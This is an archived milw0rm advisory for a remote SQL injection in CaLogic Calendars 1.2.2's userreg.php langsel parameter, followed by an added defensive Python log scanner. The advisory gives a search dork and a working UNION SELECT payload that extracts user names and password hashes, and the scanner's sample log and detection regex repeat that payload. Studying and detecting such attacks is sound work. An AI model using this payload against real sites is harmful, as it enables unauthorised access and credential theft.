CaLogic Calendars 1.2.2 langsel Remote SQL Injection Vulnerability

/---------------------------------------------------------------\
\                                                               /
/       CaLogic Calendars V1.2.2 Remote SQL injection           \
\                                                               /
\---------------------------------------------------------------/

[*] Author    : His0k4 [ALGERIAN HaCkEr]

[*] Dork      : "CaLogic Calendars V1.2.2"

[*] POC       : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}

[*] Example   : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--

[*] Note      : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'}

----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...

# milw0rm.com [2008-05-13]




His0k4, 05/13/2008
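
Added example (not part of the original advisory, and not CaLogic code): a log check a defender could run to find userreg.php requests whose langsel value matches the pattern described above. It assumes legitimate langsel values are plain integers and that the web server writes combined-format access logs; the log lines, IP addresses and the /calendar path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/May/2008:10:00:01 +0000] "GET /calendar/userreg.php?langsel=1 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [13/May/2008:10:02:17 +0000] "GET /calendar/userreg.php?langsel=1%20and%201=0'
    '%20UNION%20SELECT%20concat(uname,0x3a,pw)%20FROM%20clc_user_reg%20where%20uid=CHAR(49)--'
    ' HTTP/1.1" 200 6210',
    '192.0.2.10 - - [13/May/2008:10:03:40 +0000] "GET /calendar/index.php?langsel=abc HTTP/1.1" 200 900',
    '192.0.2.91 - - [13/May/2008:10:05:02 +0000] "GET /calendar/userreg.php?langsel=en HTTP/1.1" 200 5100',
]

# Client address and request target from one combined-format log line.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# SQL fragments of the kind shown in the advisory's example, used for triage only.
SQL_TOKENS = re.compile(r"\b(union|select|concat|from|where|char)\b|--|0x[0-9a-f]+", re.I)


def suspicious_langsel(lines, script="userreg.php"):
    """Return requests to `script` whose langsel parameter is not a plain integer."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/" + script):
            continue  # the advisory names userreg.php only
        # parse_qs URL-decodes the value, so %20-encoded payloads are normalised.
        for value in parse_qs(url.query, keep_blank_values=True).get("langsel", []):
            if value.isascii() and value.isdigit():
                continue  # assumed legitimate form: a numeric language id
            tokens = sorted({t.group(0).lower() for t in SQL_TOKENS.finditer(value)})
            findings.append({"ip": m.group("ip"), "value": value, "sql_tokens": tokens})
    return findings


if __name__ == "__main__":
    for hit in suspicious_langsel(SAMPLE_LOG):
        level = "likely SQL injection" if hit["sql_tokens"] else "non-numeric value"
        print(f'{hit["ip"]}  {level}: langsel={hit["value"]!r}')
```

The same integer-only rule can be enforced in the application or at a reverse proxy in front of it, so that a non-numeric langsel never reaches the query.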

				